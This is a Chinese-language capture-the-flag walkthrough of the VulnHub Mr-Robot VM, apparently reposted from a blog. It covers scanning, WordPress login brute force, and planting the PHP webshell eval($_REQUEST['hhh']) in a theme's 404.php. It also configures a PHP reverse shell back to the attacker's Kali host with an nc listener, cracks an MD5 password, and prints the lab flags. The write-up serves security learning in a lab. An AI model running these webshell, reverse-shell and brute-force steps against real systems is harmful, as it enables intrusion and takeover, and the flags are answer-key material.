标签：10.1 txt 扫描 Robot 404 1.135 vulnhub Mr php

从vulnhub下载并且用vmware打开Mr-Robot后，先看看是否已经给出ip地址，如果没有，就用我的kali攻击机执行买了arp-scan -l 扫描，看能否扫描出相应的ip。如果不能，就需要通过所谓拯救模式进行操作。

攻击机kali与靶机均在vmware下的NAT网段10.1.1.0/24。

kali的ip为

10.1.1.128

arp-scan -l

 

 可以扫描出靶机ip 为：

10.1.1.135

扫描端口信息

nmap -A -p- 10.1.1.135

 

 开放了80端口和443端口对应的http和https服务，我们可以进入网站试试如何展开渗透测试

 

 这是一个linux网站，提供了prepare,fsociety,inform,question,wakeup,join等命令。

输入prepare命令发现是一个视频。

输入fsociety命令发现依然是一个视频。

输入inform命令发现是一些图片和文字。

输入question命令发现是一些图片。

输入wakeup命令发现是视频。

输入join命令，弹出提示输入邮箱地址。  

我们要扫描该网页，可以应用著名的扫描神器nikto,它可以对网页进行全面的多种扫描，包含超过3300种有潜在危险的文件/CGIs；超过625种服务器版本；超过230种特定服务器问题。扫描项和插件可以自动更新（如果需要）。基于Whisker/libwhisker完成其底层功能。这是一款非常棒的工具.

nikto -h 10.1.1.135

我们可以试试wp-login界面

再用dirb扫描。只要字典足够大，用时长一些，该扫描的效果还是不错的，可以扫描出网站几乎所有的网页。

dirb http://10.1.1.135

经过一段时间的扫描（有时可能时间长，渗透测试有充分的耐心是其基本修养），发现有很多目录，其中值得注意的目录有/readme、/admin,/robots.txt、/wp-admin,/wp-login等。

下面对这些目录进行访问，看有没有有用的内容。

访问readme目录

 

 访问robots.txt

 

似乎key-1-of-3.txt可能有用，访问得

轻易就得到第一个flag！

073403c8a58a1f80d943455fb30724b9

访问fsocity.dic

看到很多的字典文件。

在kali下载该字典

wget  http://10.1.1.135/fsocity.dic

 

 socity较大，7.0M，猜测可能有重复的

 

 用命令:cat fsocity.dic | sort -u > dic.txt，去重后写入新的文件，发现去重后的字典dic.txt只有95kb大小了

 

 wp-login目录是WordPress登录界面

应该可以利用字典文件，进行爆破登录的。

我们用burpsuite的intruder爆破，字典就用dic.txt。（也可用wpscan，gobuster，hydra工具进行扫描、爆破）

先爆破用户名

 

 

 

 用户名可能为elliot、Elliot、ELLIOT，也即不区分大小写的elliot：

 

 对密码字段进行爆破，发现密码可能为ER28-0652

 

 

 

 成功登录后台

 

 WordPress往往可以利用其404文件，是wp-admin下文件，通过编辑写入恶意代码，再直接用蚁剑之类直接连接，拿下GetShell，并且一般都在一个叫Editor的栏目下

点击404文件，修改Twenty Fifteen: 404 Template (404.php)为一句话木马

<?php eval($_REQUEST['hhh']);?>

 

 404.php在http://10.1.1.135/wp-content/themes/twentyfifteen/404.php

 

 

成功进入了靶机！

然后去根目录的home目录下，

 

 发现有个可疑的robot目录，下面还有个密码文件，和第二个flag的txt文件，直接用蚁剑访问flag文件读不出东西，显然有权限限制，

 

 再看password.raw-md5密码文件

 

 可见md5密码值c3fcd3d76192e4007dfb496cca67e13b

到相关md5破译网站，可以获得robot的密码：

abcdefghijklmnopqrstuvwxyz

如果可以进行ssh连接，也就等于直接登录靶机

用robot账号登录靶机

 

 

得到第二个flag

822c73956184f694993bede3eb39f959

如果不直接进行ssh靶机登录，就要进行相应的提权操作

使用命令查找关于php-reverse的shell

find / -name php-reverse-shell.php

使用

/usr/share/laudanum/wordpress/templates/php-reverse-shell.php

按照文件操作要求，设置ip地址为kali攻击机ip:10.1.1.128，保持端口为默认8888不变，

 

 将修改后的php反弹代码粘贴在WordPress中editor页面的404.php文件。

 

 在Kali上使用nc监听相应的8888端口

在浏览器中访问修改过的404.php，

http://10.1.1.135/wp-content/themes/twentyfifteen/404.php

 

 

得到反弹shell。

查看10.1.1.135中的用户

值得注意的是家目录/home下的用户robot

 

 文件都在robot下

进入robot看看

直接查看key-2-of-3.txt即第二个flag的权限不够，但可以进入用户robot，已经给出了对应的密码md5值，到相关md5破译网站，可以获得robot的密码：abcdefghijklmnopqrstuvwxyz

但不能直接进入：

 

 要在终端下运行。我们打开交互式终端

python -c 'import pty;pty.spawn("/bin/bash")'

就得到第二个flag

822c73956184f694993bede3eb39f959

 

标签：10.1,txt,扫描,Robot,404,1.135,vulnhub,Mr,php
来源： https://www.cnblogs.com/miraitowa666/p/15106918.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。